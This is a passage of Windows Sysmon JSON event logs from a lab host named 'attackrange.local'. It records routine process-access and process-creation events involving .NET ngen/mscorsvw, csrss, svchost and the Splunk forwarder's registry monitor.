ndows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.246","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04DA-5F25-0000-0010EE821100}","TargetProcessId":"1164","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7768,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.246\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04DA-5F25-0000-0010EE821100}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.246","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04DA-5F25-0000-0010EE821100}","TargetProcessId":"1164","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7769,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.246\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04DA-5F25-0000-0010EE821100}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.246","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04DA-5F25-0000-0010EE821100}","TargetProcessId":"1164","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7770,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.450\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04DA-5F25-0000-001083871100}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.450","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04DA-5F25-0000-001083871100}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7771,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.450\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04DA-5F25-0000-001083871100}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.450","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04DA-5F25-0000-001083871100}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7772,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.450\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04DA-5F25-0000-001083871100}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.450","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04DA-5F25-0000-001083871100}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7773,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.497\r\nProcessGuid: {A837DB8D-04DA-5F25-0000-0010918A1100}\r\nProcessId: 4808\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.497","ProcessGuid":"{A837DB8D-04DA-5F25-0000-0010918A1100}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7774,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.497\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-04DA-5F25-0000-0010918A1100}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.497","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-04DA-5F25-0000-0010918A1100}","TargetProcessId":"4808","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7775,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.497\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04DA-5F25-0000-0010918A1100}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.497","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04DA-5F25-0000-0010918A1100}","TargetProcessId":"4808","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7776,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 